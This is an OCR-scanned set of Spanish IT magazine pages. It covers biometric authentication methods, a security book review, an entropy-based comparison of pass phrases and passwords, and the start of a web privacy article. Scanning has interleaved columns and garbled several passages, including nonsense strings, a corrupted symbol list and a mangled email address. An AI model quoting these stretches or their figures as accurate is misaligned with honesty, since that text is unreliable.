cientos de empleados y que se le encarga controlar 
el acceso principal a la compañía. Muy difícilmente 
podrá recordar el rostro de todo el personal como 
para permitir o denegar el acceso a la planta. El 
sistema de autenticación del caso anterior ya no 
servirá si se tiene en cuenta las limitaciones que 
posee. 

Teniendo en cuenta esto y a lo largo del tiempo se 
han desarrollado diferentes métodos de autentica- 
ción de usuarios que están basados en: 


Algo que el usuario conoce, como ser una contrase- 
ña. 

Algo que el usuario posee, como ser una tarjeta 
magnética. 

Algo que el usuario es, o sea una propiedad intrín- 
seca del mismo como ser las huellas dactilares. 


En esta oportunidad nos ocuparemos de desarrollar 
aquellos sistemas de autenticación biométricos. 


Sistemas de autenticación biométricos 


El uso de contraseñas se ha usado por muchos 
años e incluso actualmente dada la sencillez de su 
implementación y el bajo costo pero ha resultado 
ser el eslabón más débil de la cadena. Según el 
CERT, el 80% de los ataques que ellos investigan 
están relacionados con contraseñas debido a su 
debilidad. Nos podemos preguntar a qué se debe 
tan alto porcentaje y la respuesta la encontramos en 
quién conoce esa contraseña, o sea el ser humano. 
Intencionalmente o no, los humanos no somos per- 
fectos y podríamos olvidar, prestar, divulgar nues- 
tras contraseñas. A esto sumémosle políticas mal 
implementadas en la creación y el mantenimiento 
de las mismas que hace que puedan ser intercepta- 


das, adivinadas o crackeadas. 

Por su parte, poseer una tarjeta de identificación, un 
token o llave de seguridad es más confiable que poseer 
una simple contraseña pero tengamos en cuenta que 
puede ser extraviada, robada o bien duplicada por lo que 
pierde cierto grado de confiabilidad. 


De todos los sistemas de autenticación, los más robus- 
tos en cuanto a seguridad puede decirse que son los 
basados en características fisiológicas del individuo o 
bien en su comportamiento. Está demostrado que cada 
individuo posee ciertas propiedades intrínsecas que los 
diferencia del resto y los hace únicos. Estas característi- 
cas hacen que sean prácticamente inimitables. Dentro 
de estas características encontramos las huellas dactila- 
res, el iris del ojo, la geometría de la mano, el timbre de 
voz, etc. 

Un aspecto a tener en cuenta es cuán amigable resulta 
ser el sistema. La mayoría de la gente encuentra acep- 
table que le sean tomadas fotografías por video cámaras 
o el hecho de hablar frente a un micrófono. Mientras que 
en los Estados Unidos el uso de sensores de huellas di- 
gitales parece no ser un problema, en algunos otros 
países existe un fuerte rechazo cultural a tocar algo que 
haya sido tocado por mucha gente como los sensores 
dactilares o de mano entera. 


Beneficios de emplear la biometría 


Las estrategias de autenticación basadas en la biome- 
tría evitan muchas de las debilidades en la seguridad, en 
especial aquellas relacionadas al factor humano. Si 
tomamos como ejemplo las huellas digitales de cada ser 
humano, podemos decir que: 


Las huellas digitales no pueden ser “adivinadas” o com- 
partidas como una contraseña. 

La seguridad no depende del esfuerzo humano ya que 
éste no se tiene que ocupar de “fortalecerla” ni de cam- 
biarla cada tanto tiempo. 

El individuo no puede olvidarse sus huellas digitales, e- 
vitando así llamadas a la mesa de ayuda. 

Es muy difícil “prestar” las huellas digitales. 

Estos sistemas son menos susceptibles a la ingeniería 
social que el uso de contraseñas. 

A causa de que los sistemas biométricos utilizan ca- P»> 


racterísticas propias de los usuarios en 
vez de algo que deban recordar o llevar, 
son menos susceptibles del mal uso. 


Claro, uno podría preguntarse qué suce- 
dería si alguien utiliza un dedo amputado 
de un individuo, pero estos son casos ex- 
tremos. 

Una de las formas de vulnerar estos siste- 
mas sería interceptar la información proce- 
sada por los sensores y reutilizarla como si 
se tratara del individuo original. 


Diferentes clases de 
sistemas biométricos 


Escaneo de huellas digitales 


Entre todas las técni- 
cas bioméftricas, la i- 


dentificación de 
huellas dactilares es 
el método más 


antiguo utilizado en 
diferentes aplicacio- 
nes. Cada individuo 
posee huellas digita- 
les únicas e inmuta- 
bles formadas por 
cantos y surcos en la 
superficie del dedo. 
La unicidad de una 
huella se puede de- 
terminar por el patrón 
de dichos cantos y 
surcos del cual se 
extraen minúsculos 
puntos para su pos- 
terior análisis. O sea 
que no se analiza la 
huella como un 
gráfico todo sino que se extraen solamen- 
te algunas referencias. 


El escaneo consiste en explorar la zona de 
la huella a través de dos posibles tecnolo- 
gías: un método óptico que consiste en 
generar una imagen de la huella o a través 
de un campo eléctrico que varía en función 
de la geometría de la misma. Como contra 
podemos citar que una lastimadura o su- 
ciedad impregnada en la yema del dedo 
hará que el sistema falle en su reconoci- 
miento. 


Dentro de las aplicaciones típicas donde el 
nivel de seguridad buscado no es tan 
crítico podemos encontrar teclados y 
ratones que para ser usados deben reco- 
nocer que el usuario es quién dice ser. 
Incluso existen escáneres para ser adap- 
tados a notebooks a través de puertos 
USB o bien en tarjetas PCMCIA. Todos los 


métodos apuntan a garantizar la identidad 
correcta de quién accede a un equipo. 


La autenticación mediante el escaneo de 
huellas se realiza actualmente en el cierre 
de puertas, cerraduras de cajas fuertes y 
hasta racks con equipos donde el acceso 
debe ser altamente restringido. Un uso 
muy particular es en este teléfono celular 
de la firma Casio que adoptó el sensor de 
huellas y las reproduce en pantalla. 


Escaneo de manos 


Este sistema emplea la forma geométrica 
de la mano para establecer la identidad de 
un individuo. Dado que las manos de los 
individuos no son únicas pues puede 
haber dos iguales entre ellos, esta técnica 
emplea una combinación de rasgos. 
Algunos dispositivos miden sólo dos 
dedos mientras que otros miden la mano 
entera. Los 
rasgos que se 
tienen en cuenta 
son la curva de 
los dedos, el 
grosor y la longi- 
tud, el alto y el 
ancho de la 
palma y la estruc- 
tura de los 
huesos. 
Obviamente, la 
alteración de 
alguno de estos 
rasgos puede 
hacer fallar al 
sistema o consi- 
derar intrusos a 
quienes no lo 
sean o peor aún, 
no reconocer a 
quienes debe. De 
esta manera y 
previniendo esto 
el sistema 
permite regular el 
nivel de seguridad deseado. El sistema 


E¡1TMPYPágina_33.nex 


emplea una cámara de 32.000 píxeles 
para tomar una imagen tridimensional de 
la mano y poderla comparar con una pre- 
viamente registrada en el proceso conoci- 
do como enrolamiento. Para el análisis el 
sistema desecha detalles de superficie 
como el largo de las uñas, huellas digita- 
les, suciedad, etc., ya que pueden variar 
día a día. 


En muchos aeropuertos se utiliza el 
escaneo de mano para permitirle a los 
clientes frecuentes evitar molestas colas 
de espera. Un uso frecuente es para el 
ingreso y egreso de personal ya que el 
tiempo que lleva reconocer un individuo es 
de tan solo 5 segundos de exploración y 
menos de uno para verificación. 


Reconocimiento del iris 
Los sistemas biométricos basados en esta 


técnica emplean rasgos únicos para iden- 
tificar la identidad del individuo. Dado que 


en cada uno de 
sus ojos y que 
estos sean 
fáciles de captu- 
rar, convierte a 
esta técnica en 
altamente con- 
sistente frente a 
intentos de falsifi- 
cación o fraude. 


El reconocimien- 
to de iris comien- 
za tomándole al 
ojo del individuo 
una fotografía de muy alta resolución con 
cámara infrarrojas. El tiempo de exposi- 
ción dura entre uno y dos segundos y 
alcanza para registrar la muestra y poder 
compararla con las previamente grabadas. 


miento. 


Se debe destacar que el uso de anteojos o 
lentes de contacto no presenta problemas 
en la calidad de la imagen tomada. 


De todos los sistemas de 
autenticación, los más ro- 
bustos en cuanto a seguri- 
dad puede decirse que son 
los basados en caracterís- 
ticas fisiológicas del indivi- 
duo o bien en su comporta- 


La técnica consiste 
básicamente en 
pronunciar un texto 
frente a un micrófo- 
no para luego ser 
comparado con 
aquel mismo pre- 
viamente incorpora- 
do al sistema. En 
caso de existir coin- 
cidencia, se proce- 
derá a realizar una 
acción determina- 
da. 

La voz humana es 
el resultado de una mezcla de frecuencias 
(tonos) que definen una característica par- 
ticular que denominamos timbre. Este pa- 
rámetro es el que nos permite distinguir 
una voz de otra de la misma manera que 
reconocemos un piano tocando la misma 
nota que un violín. Si bien ambas notas 
puedan ser de la misma frecuencia 
central, el sonido proveniente de cada uno 


El sincronizar los datos de video con la identificación del 
habla permite un reconocimiento más exacto de lo que el 
usuario quiere expresar 


los patrones del iris son extremadamente 
complejos, esta característica provee de 
un altísimo nivel de seguridad. Estos pa- 
trones son únicos para cada individuo, aún 
tratándose de personas gemelas. Los 
mismos se forman antes de nacer y se 
tornan estables luego del primer año de 
vida, permaneciendo inmutables por el 
resto de la vida. Por este motivo podrían 
considerarse inimitables. El hecho de que 
un ser humano posea patrones diferentes 
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Reconocimiento de voz 


Tal vez esta técnica sea una de las más di- 
fundidas pues se encuentra en diversos 
campos. Desde los software de reconoci- 
miento de voz que permiten el dictado de 
texto en forma dinámica hasta su uso en o- 
peraciones bancarias para evitar el fraude, 
esta técnica se ha ido popularizando cada 
vez más hasta llegar a dispositivos que 
funcionan gracias al dictado de órdenes. 


posee un agregado de frecuencias que lo 
hace distinguible del otro. 

La técnica entonces permite desglosar la 
VOZ para analizar su frecuencia central y la 
cantidad de otras frecuencias agregadas 
que le imprimen su timbre particular. El 
sonido que Ud. emite frente al micrófono 
se registra como una señal analógica, se 
la separa en sus componentes de frecuen- 
cia y cada una de ellas se digitaliza 
para poder ser procesada por una > 
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computadora. La señal así obtenida es un 
patrón binario que se lo compara con otro 
previamente grabado. Una de las desven- 
tajas de los sistemas de reconocimiento 
de voz es que si el individuo se encuentra 
resfriado o disfónico, el sistema lo consi- 
dera un intruso salvo que se amplíe el 
nivel de sensibilidad. 


Las aplicaciones tradicionales del recono- 
cimiento de voz son actualmente el 
dictado de texto u órdenes, ya sea en apli- 
caciones informáticas o incluso en teléfo- 
nos celulares para su discado automático. 


En lo que respecta a seguridad se está ha- 
ciendo cada vez más eficaz en operacio- 
nes bancarias en reemplazo de contrase- 
ñas un número de identificación personal 
(P.1.N.). Recientemente la firma Philips ha 
lanzado un ecógrafo con el agregado de 
un módulo que permite reconocer la voz 
del usuario para realizar anotaciones a 
modo de informe mientras es manipulado. 
Una especie de secretaria digital. 


Por su parte la firma Intel ha desarrollado 
un software de reconocimiento audiovisual 
que se basa no solamente en reconoci- 
miento de voz sino que la computadora 
mediante una cámara o webcam puede 
detectar el rostro de la persona que habla 
v rastrear los movimientos de su boca. El 


sincronizar los datos de video con la iden- 
tificación del habla permite un reconoci- 
miento más exacto de lo que el usuario 
quiere expresar, mejorando así una amplia 
variedad de aplicaciones incluso en am- 
bientes ruidosos. 


Sistemas biométricos basados 
en el comportamiento del indi- 
viduo 


Estos sistemas se basan en característi- 
cas del comportamiento del ser humano 
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Por PCE Cara ato, 


como son la forma en que realiza su firma 
o escribe en un teclado. 


Reconocimiento de firma 


Como un reemplazo de contraseñas o 
PIN's, la verificación de firma dinámica es 
una tecnología biométrica que se utiliza 
para identificar a un individuo a través de 
su firma manuscrita. 


Hay una importante diferencia entre lo que 
es una comparación simple de firmas y 
una verificación dinámica de firmas. Si 
bien ambas pueden ser computarizadas la 
comparación simple solamente tiene en 
cuenta el dibujo de la firma mientras que la 
verificación dinámica tiene en cuenta 
cómo fue hecha la firma, o sea lo que los 
parámetros que se tienen en cuenta son la 
velocidad, presión y tiempo que lleva a un 
individuo realizar su firma. 


Una firma puede ser imitada en cuanto a lo 
que parece pero resulta prácticamente, im- 
posible para quién no es el firmante origi- 
nal, hacer coincidir todos los parámetros 
antes descriptos. 


Si bien hay leves variaciones en la firma 
manuscrita de una persona, la consis- 
tencia creada por el movimiento 
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natural y la práctica alcanzada con el 
tiempo crean patrones reconocibles 
dignos de utilizarse como técnica biométri- 
ca. 


Reconocimiento de escritura en 
un teclado 


En  compara- 
ción a otras téc- 
nicas examina- 
das, el recono- 
cimiento de 
tipeo es el más 
fácil de imple- 
mentar y admi- 
nistrar debido a 
que es una so- 
lución comple- 
tamente 
basada en software. No existe necesidad 
de instalar ningún hardware adicional. 


El nivel de 


lo utilice. 


El individuo debe tipear una palabra o con- 
junto de palabras específicas durante la 
etapa de enrolamiento. En la mayoría de 
los casos se utiliza el nombre de usuario y 
contraseña. Para crear la muestra el indi- 
viduo debe tipear el texto varias veces 
para que el sistema pueda establecer un 
promedio de muestras. 
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deberá ser ajustado en 
función de la necesidad o- 
perativa de la empresa que  ¿ 


Las características que se tienen en 
cuenta para el análisis incluyen la veloci- 
dad de tipeo, el tiempo que transcurre 
entre tecleos consecutivos, el tiempo que 
se presiona cada tecla, la frecuencia con 
que se utilizan otras teclas como números 
o teclas de funciones y la secuencia de 
teclas presionada cuando se accede a una 
mayúscula (o 
sea si se suelta 
primero la tecla 
shift o la tecla 
correspondien- 
te a la letra). 


sensibilidad 


bien esta 
técnica resulta 
familiar a los in- 
dividuos, pues 
están acostum- 
brados al uso de nombres de usuario y 
contraseñas, tiene como debilidades que 
éstos pueden ser olvidados, prestados, 
comprometidos, etc. 


Algunas consideraciones finales 


Desde el punto de vista de la seguridad, 
pensemos que los sistemas biométricos 
pueden ser ajustados para obtener mayor 
o menor sensibilidad. 


Fingerprint: 


Tomemos como ejemplo la alarma de un 
auto. Cuando dicha alarma es muy sensi- 
ble, la probabilidad de robo es bastante 
baja pero cualquier perturbación podría 
disparar una falsa alarma. Asimismo, 
reducir la sensibilidad reduciría la cantidad 
de falsas alarmas pero aumentaría la posi- 
bilidad de robo. 


El nivel de sensibilidad deberá ser ajusta- 
do en función de la necesidad operativa de 
la empresa que lo utilice. Pero se deberá 
tener en cuenta que si el sistema biométri- 
co no permite que los empleados ingresen 
cómodamente, se verá una suerte de frus- 
tración causando rechazo o no aceptación 
del mismo. 


Una forma de medir la sensibilidad de un 
sistema biométrico es a través de lo que 
se denomina tasa de falsos positivos y 
tasa de falsos negativos. 


La tasa de falsos positivos es la probabili- 
dad de que el sistema permita ingresar in- 
trusos. 


Esta cifra ronda entre el 0,0001% y el 
0,1% para los sistemas actuales, tomando 
como base un intento de ingreso conven- 
cional, no mediante fuerza bruta. 


Por su parte, la tasa de falsos negativos es 
la probabilidad de que el sistema no reco- 
nozca y no acepte el ingreso de usuarios 
válidos. Esta cifra ronda entre el 0,00066% 
y el 1,0% siendo importante observar que 
un factor elevado hará que los usuarios se 
sientan frustrados si el sistema los 
rechaza siendo válidos. 


Como ejemplo podemos mencionar que la 
técnica de reconocimiento del iris arroja 
que la probabilidad que un intruso sea va- 
lidado en el sistema es de 1 en 1.200.000, 
considerando esta técnica como una de 
las más precisas. 
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LIBROS 


Seguridad informática para 
empresas y particulares 


G. Álvarez y P. Pérez - Editorial: McGraw Hill 


Aunque la mayoría de usuarios particulares y de empresas tienen la percepción de que la seguridad de la información almacena- 
da en soportes informáticos es una tarea difícil de aplicar y que exige una gran cantidad de dinero y de tiempo, los autores de este 
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manual aseguran que, en realidad, con poco esfuerzo se puede lograr un nivel de seguri- 
dad razonable. 


Síntesis 


La informática ha pasado a formar parte de la actividad cotidiana de empresas y particula- 
res. Los ordenadores almacenan información, la procesan y la transmiten a través de redes, 
abriendo nuevas posibilidades de ocio y de negocio. Cuanto mayor es el valor de la infor- 
mación gestionada, más importante es asegurarla. La mayoría de usuarios particulares y de 
empresas poseen la percepción de que la seguridad de la información es una tarea difícil 
de aplicar, que exige gran cantidad de dinero y de tiempo. En realidad, con muy poco es- 
fuerzo se puede alcanzar un nivel de seguridad razonable, capaz de satisfacer las expec- 
tativas de seguridad de particulares y de pequeñas y medianas empresas. No siempre es 
fácil convencer a alguien para que pague más por algo que hace lo mismo, aunque de 
forma más segura. Esperar a que ocurra un desastre para adoptar una postura segura, 
suele ser un error garrafal y, normalmente, muy caro. Haciendo uso de herramientas que 
vienen suministradas con el propio sistema operativo o que son en su mayoría gratuitas, en 
este libro aprenderá como mantener la seguridad informática en su empresa. “Seguridad in- 
formática para empresas y particulares”, ha sido realizado en colaboración con Panda 
Software y pretende elevar el nivel de conocimiento de cuestiones relacionadas con la se- 
guridad informática tanto para los usuarios particulares, como para los técnicos informáti- 
cos de pymes. 

http://www.belt.es/bibliografia/articulo.asp?id=501 
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Este es el segundo de una serie de artículos sobre pass phrases versus passwords. La 
primera entrega cubría los fundamentos de passwords y pass phrases, cómo son guarda- 
dos, y otros. En esta entrega discutiré la fortaleza relativa de cada tipo de password, y usaré 
algunos conceptos de matemática para ilustrar. En el tercer artículo, ofreceré algunas con- 
clusiones y guía sobre cómo elegir passwords y configurar una política de passwords. 


Los argumentos a favor y en contra 


Las pass phrases están de moda por un 
número de razones, una es el desarrollo 
de herramientas que pueden crackear 
muchos passwords en minutos. Estas her- 
ramientas no son nuevas. El Password 
Appraiser Quakenbush podía hacerlo en 
1998. Lo que es nuevo es la teoría y prác- 
tica detrás del trade off (intercambio) 
espacio-tiempo, propuesto por el Dr. 
Phillippe Oechslin (ver el artículo en NEX 
IT Specialist +11, Pág. 26, "Rainbow 
Crack"). 

El intercambio tiempo-espacio significa 
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que usted no guarda todos los posibles 
hashes, lo que requeriría más espacio que 
el que existe en el universo (si trata de 
guardar los hashes NT). 

Guardar todos los hashes de passwords 
de hasta 14 caracteres, usando un conjun- 
to de 76 caracteres posibles; requeriría 
5.652.897.009 exabytes de almace- 
namiento que superaría la capacidad de 
cualquier Filesystem (sistema de archivos) 
actual. Aún guardar todos los hashes LM 
(que requeriría 310 terabytes) es aún im- 
posible. Para solucionar este dilema, el Dr. 
Phillippe Oechslin introdujo la idea de un 
trade-off (intercambio) tiempo-espacio 


donde sólo se guarda una porción del 
hash y su password asociado. Esto corta 
drásticamente el lugar necesario de alma- 
cenamiento, y con sólo 17 gigabytes de 
espacio se pueden guardar los hashes LM 
para el mismo conjunto de caracteres. 
Como veremos, uno de los argumentos 
primarios para el uso de pass phrases es 
que ellas hacen prohibitivos los requeri- 
mientos de almacenamiento y así evitan 
los ataques con hashes pre-computados. 


Argumento 1: Los usuarios pueden 
recordar las pass phrases 
»> 


El primer argumento de los que proponen 
las pass phrases es que los usuarios 
pueden recordar más fácilmente una pass 
phrase que un password largo de 10 o 
más caracteres. Eso puede ser cierto, 
pero como son pocos los usuarios que 
usan un password de 10 o más caracteres, 
es difícil de decir. Para analizar esa 
cuestión, llevé a cabo un estudio total- 
mente no científico con la idea de compro- 
bar si los usuarios pueden recordar un 
password de 10 caracteres. Pregunté a los 
administradores cual era su opinión; 99% 
de ellos dijeron no solo que los usuarios 
no recordarían un password de 10 carac- 
teres sino que además ellos se rebelarían 
si fueran forzados a usar uno así. 
¿Pueden los usuarios recordar una frase 
de 10 caracteres? Probablemente, ya que 
hay solamente algunas pocas palabras en 
ellos. Un famoso trabajo clásico que 
siempre me gusta mencionar es de Miller 


cialmente. Mientras este ejemplo no es en- 
teramente representativo de todos los 
passwords, la estadística a través del 
resto de este artículo se ha basado en mí 
análisis de esos 23.311 passwords crack- 
eados. Este análisis le otorga alguna 
creencia al límite de 9 caracteres: 64 % de 
los passwords crackeados del dominio, 
(se exigía un mínimo de 7 caracteres) eran 
9 caracteres o menos. Por lo menos 
90,37% de todos los passwords del 
dominio eran menores a 15 caracteres. 
(Es imposible decir exactamente cuántos 
tienen menos de 15 caracteres, salvo que 
los passwords sean capturados como 
texto plano (clear text). Por ende, esos 
passwords sin un hash LM eran asumidos 
de ser de 15 caracteres o más largos a 
pesar de que a algunos les faltaba un hash 
LM por otras razones). 


En una pass phrase, cada palabra es un 


(1956): "The Magical trozo. El 
Number Seven, Plus or promedio 
Minus Two: Some Limits On IMENELCEA CL) LPEMPEMIECUCSA de una 
Our Capacity For En palabra en 
Processing Information." LM (que requeriria 310 tera- inglés es 
(EL mágico número 7, más bytes) es aún imposible. de 5 car- 
o menos 2: algunos límites acteres. 
en nuestra capacidad de En inglés 
procesar información). 5  carac- 

teres por 


La premisa de este trabajo (que es uno de 
esos escritos donde es suficiente con leer 
el título), es que los humanos tienen una 
capacidad limitada de procesar informa- 
ción. Podemos recordar 7, más o menos 2, 
trozos de información a la vez. El número 
7 en sí mismo es menos importante que el 
hecho de que la capacidad de procesar in- 
formación es limitada. Alguna gente cree 
que el número es 5, más o menos 2. Yo 
conocí algunos que insisten que es 3. En 
cualquier caso, la capacidad de procesar 
información está severamente limitada. 

La definición de un "trozo" también varía 
de acuerdo a lo que tratamos de hacer. En 
un password de 10 caracteres elegidos al 
azar, un trozo es un símbolo y Miller es- 
tablecería que la mayoría de la gente no 
podría recordar 10 símbolos elegidos al 
azar. Es mucho más fácil que un usuario 
recuerde una frase de 10 caracteres com- 
puesta de 2 o 3 palabras (en este caso los 
trozos son palabras). 


Si asumimos que los usuarios pueden 
recordar 7 trozos, palabras, o símbolos, 
entonces el más largo de los passwords 
que ellos podrán usar deberá estar limita- 
do a 9 caracteres. Esta postura ha sido 
validada por testeo empírico. Para evaluar 
la fuerza de los passwords, yo crackeé 
28.000 passwords de un dominio grande. 
De esos fui capaz de crackear completa- 
mente 23.311 o 83% y unos 13.16% par- 


palabra es también la medida estándar 
para medir la velocidad de tipeo en pal- 
abras por minuto. Del mismo modo, en un 
relevamiento en 1995 de 45 usuarios PGP, 
Arnold Reinhold descubrió que el prome- 
dio de pass phrases PGP contienen pal- 
abras de 5.3 caracteres. Reinhold también 
reporta que 5/8 de todas las palabras de 
este estudio eran palabras del diccionario 
en inglés. Esa muestra es tan pequeña 
que la deja científicamente inválida, pero 
es lo mejor que tenemos en la poca liter- 
atura disponible. 


Retornando a Miller, un usuario recordan- 
do una oración de 7 palabras puede tener 
un password de 41 caracteres. Hay varias 
falencias en este razonamiento. Primero 
es improbable que una pass phrase real 
sea así de larga. Por ejemplo mi pass 
phrase actual (sí, yo las uso) es de sola- 
mente 35 caracteres de largo. Y yo ya 
pienso que es incómoda. También, 
Reinhold encontró que la pass phrase 
media contiene solo 4 palabras. 


Argumento 2: Más largo es más fuerte 


El otro argumento a favor de las pass 
phrases es que ellas son más largas y por 
ende más fuertes. Aún así, el largo de una 
pass phrase no es comparable al largo de 
un password. Los passwords más largos 
son considerados mejores por la típica 


TES 


forma de medir la fuerza del password (el 
tiempo que se tarda en crackearlos). Por 
ejemplo, como vimos antes, tomaría 5 
años y 11 meses más crackear un pass- 
word de 8 caracteres que uno de 7 carac- 
teres. Esto es sólo acertado si el password 
es realmente al azar y cada símbolo tiene 
igual probabilidad de aparecer en el pass- 
word. Si el password no es realmente al 
azar, estos cálculos ya no son válidos. 


Como un argumento adicional para los 
passwords largos, se cita frecuentemente 
que los passwords más largos de 14 car- 
acteres no generan hashes LM. 
Considerando que podemos remover a los 
hashes LM de otras formas, la mera elimi- 
nación no es realmente una ventaja de las 
pass phrases. 


¿Pero existe entonces una ventaja en el 
largo? No realmente. Los crackeadores de 
passwords actuales están diseñados para 
crackear símbolos, pero no hay razón para 
que los futuros usen palabras como sím- 
bolos. Muchos de nosotros creemos que 
así sucederá. Así que passwords más 
largos no necesariamente implican una 
ventaja en futuro. Sólo ayudan a cancelar 
los efectos de las herramientas de crack- 
ing de hoy. 


Argumento 3: Las Pass Phrases 
pueden ser más aleatorias 


Hay una ventaja distinta para las pass 
phrases: alta entropía. La entropía es la 
medida de aleatoriedad. Hay tres compo- 
nentes en la entropía: el número de ítems 
elegidos, el tamaño del conjunto desde el 
cual son elegidos, y la probabilidad de que 
cada ítem individual sea elegido. Ya que 
las pass phrases son más largas que los 
paswords, podrían tener un potencial para 
la entropía más alta que los passwords, 
incluso si son tomados desde el mismo 
conjunto de caracteres. Esto es digno de 
destacar porque los passwords crackers 
pueden ser diseñados para operar proba- 
bilísticamente. En vez de simplemente 
tratar cada combinación posible de letras 
en un password, los passwords crackers 
comienzan con combinaciones comunes 
desde un diccionario, luego se mueven 
sobre permutaciones de ésas basadas en 
frecuencias de letras. Así, nuestro cálculo 
de tardar 28 días para crackear un pass- 
word de 7 caracteres puede no ser exacto. 
En realidad, es posible frecuentemente 
crackear muchos passwords en pocos se- 
gundos, dependiendo de cómo están com- 
puestos. Por lo tanto, entropía es una 
mejor medida en la fortaleza de password, 
que la longitud simple y el conjunto de car- 
acteres usados. 

»> 
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Veamos algunos ejemplos. Nuestro testeo 
revela que más del 83% de los passwords 
en nuestro ejemplo estaban extraídos so- 
lamente del conjunto de caracteres com- 
puesto de letras, números y los símbolos 
10H45$%28.*()-_+=. Este conjunto de carac- 
teres tiene 26+26+10+14=76 símbolos en 
inglés, y un poco más en otros lenguajes. 
Además, el 80% de los símbolos usados 
en esos passwords son elegidos sólo 
entre 32 de esos 76 símbolos. Los 32 sím- 
bolos comunes son, en orden de número 
de apariciones: 
ealoirn0st2lud!m3hcyg94kSbpM758B. 
Aún más interesante, el 10% de los pass- 
words están compuestos únicamente por 
éstos 32 símbolos. 

La entropía natural, o la proporción abso- 
luta (absolute rate), de un conjunto de car- 
acteres de 76 símbolos es R=Log2L = 6.25 
bits por símbolo. La proporción absoluta 
es considerada típicamente un límite su- 
perior en entropía, y presume que cada 
caracter tiene igual probabilidad de ser 
elegido. Aunque, C.E.Shannon, calculó la 
entropía por letra de un trozo de 8 letras 
de inglés como 2.3 bits por letra (Shannon, 
C.E., "Predication and Entropy in Printed 
English," Bell System Technical Journal, v. 
30, n. 1, 1951, pp. 50-64). Hay que tener 
en cuenta que el trabajo de Shannon 
estaba basado en palabras en inglés 
usando un conjunto de 26 caracteres, y no 
un conjunto de caracteres con 76 símbo- 
los, como en nuestro ejemplo. Pero, 
hemos visto que los usuarios eligen la 
mayoría de los símbolos de solamente 
entre 32 símbolos. En todo caso, la en- 
tropía por símbolo en un password es 
probablemente más grande que el 2.3 cal- 
culado por Shannon, pero más pequeña 
que la proporción absoluta de 6.25. Log2 
32 =5, aunque un poco más alto, serviría 
bien como una apreciación de límite supe- 
rior de entropía por bit de un password. 
Como el password promedio es 9.16 car- 
acteres de largo, que redondeamos a 9, un 
password no tiene más que 9*5=45 bits 
de entropía. 


El argumento para pass phrases es que la 
gente tiene más de 76 palabras en su vo- 
cabulario. Una pass phrase también puede 
ser considerada como compuesta de un 
lenguaje - de palabras disponibles en el 
lenguaje usado para la construcción de las 
pass phrase. El diccionario de inglés 
Oxford contiene 616.500 palabras. Solo 
expertos o alumnos que buscan ingresar a 
la universidad utilizarán 614.000 de esas 
palabras. En realidad, el vocabulario 
promedio de un americano (sin comentar- 
ios de europeos aquí) está estimado entre 
10.000/20.000 por el linguista Richard 
Lederer y entre 50.000/70.000 por James 
L. Fidelholtz. Ambos expertos concuerdan 
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que la gran mayoría son palabras "recono- 
cidas"(es decir si alguien las menciona las 
reconocen pero ellos no las usan). Una 
persona común sólo usará una fracción de 
esas palabras. 


Asumamos que las pass phrases están 
basadas en un conjunto de sólo 300 pal- 
abras. Esa es probablemente una esti- 
mación conservadora, pero por otro lado, 
la mayoría de esas palabras sólo tienen 
sentido cuando se las agrupa de un modo 
particular, decreciendo significativamente 
el factor aleatorio de la pass phrase. Para 
calcular la entropía de una pass phrase, 
necesitamos saber cuántas palabras son 
utilizadas. El número medio de palabras 
en el estudio PGP referido arriba fue 4, 
pero el promedio fue superior. Para dar 
crédito a la memoria de Miller, permitá- 
monos usar un pass phrase de 5 palabras 
promedio. 


Si hay 5 caracteres por palabra, tenemos 
25+4=29, en donde 4 son espacios. 
Cuánta entropía contiene esa pass phrase 
depende de a quién pertenece la esti- 
mación que usted use. Usando la esti- 
mación de Shannon de 2.3 bit por letra en 
una palabra de 8 letras, da una entropía 
total de 29*2.3=66.7 bits. El cálculo de 
66.7 bits es probablemente un límite supe- 
rior razonable para 
la entropía de la 
pass phrase, y se 
compara favorable- 
mente con un pass- 
word de 9 carac- 
teres con 45 bits de 
entropía. Para un 
límite inferior, podemos usar la estimación 
de Bruce Schneier de 1.3 bits por letra, 
basada en un estudio de Thomas Cover 
(B. Schneier, "Applied Cryptography, 2nd 
Edition," Wiley, 1996). Shannon postuló 
1.3 bits por letra para una palabra de 16 
letras, de modo que probablemente no 
sea enteramente aplicable para nuestras 
palabras de 5 caracteres. En todo caso, 
usando 1.3 como entropía da 29*1.3= 
37.7, la cual es peor que un password de 
9 caracteres. Basados en este número, 
necesitaríamos una pass phrase de 6 pal- 
abras para conseguir aproximadamente la 
misma entropía que un password de 9 car- 
acteres. 


Nuevamente, nuestro cálculo de la en- 
tropía de pass phrase no considera inter- 
namente el vocabulario estimado en los e- 
jemplos. Podemos presumir que si las 
pass phrases se vuelven populares, los 
"hackers" empezarán usando "pass 
phrase crackers" que emplean la palabra, 
en vez del símbolo, como la unidad. Esta 
situación podría cambiar significativa- 


No sabemos mucho sobre 
el uso de que la gente hace 
de las passphrases 


mente la manera de calcular el carácter 
aleatorio de los passwords. Usando pal- 
abras como unidades tal vez sea más 
apropiado que utilizar letras compuestas 
de palabras como símbolos. Si usamos 
300 palabras en nuestro vocabulario para 
las pass phrases y asumimos que pueden 
ser aleatoriamente combinadas, obten- 
emos una proporción absoluta por palabra 
de Log2300 = 8.23 bits por palabra. 
Utilizando una pass phrase de 5 palabras 
producirá 8.23*5= 41.2 bits de entropía, y 
utilizando un pass phrase de 6 palabras 
dará en total 49.4 bits de entropía. 


Utilizando palabras como unidades hace 
que las pass phrases sean menos atracti- 
vas que los passwords. De hecho, pass 
phrase de 5 a 6 palabras son aproximada- 
mente tan fuertes como un password de 9 
caracteres. Yo quisiera resaltar que esto 
no es un resultado científicamente aproba- 
do. Más estudios son necesarios para 
validar los cálculos de entropía. 


Reflexiones finales 


En esta entrega de la serie de artículos 
sobre passwords, dimos un primer paso 
hacia el análisis de passwords y pass 
phrases. Como ustedes habrán notado no 
sabemos mucho sobre el uso que la gente 
hace de las pass 
phrases. Para enten- 
der más sobre esto, 
quisiéramos pedirles 
un favor. Si quisieran 
ayudarnos, piensen 
en una pass phrase 
que usen (¡preferible- 
mente que no sea una que actualmente 
estén usando!) y  envíenla a 
passstudOmicrosoft.com .* Esperamos 
obtener suficientes muestras para ser 
capaces de realizar algunos análisis sobre 
pass phrases y comprender cómo están 
formadas. 


* Únicamente retendremos la pass phrase 
que ustedes nos envíen de modo de poder 
realizar nuestros análisis. No almacenare- 
mos su mail u otra información personal. 
La pass phrase que envíen será agregada 
con las otras pass phrases que recibamos 
y no se asociarán con ninguno de sus 
datos personales enviados en el mail. 


ATTE 


Privacidad y Seguridad en la 


Web 


por: Hernán L. Cuevas - MCSE 


A pesar de ser actualmente un tema de público conocimiento, el 
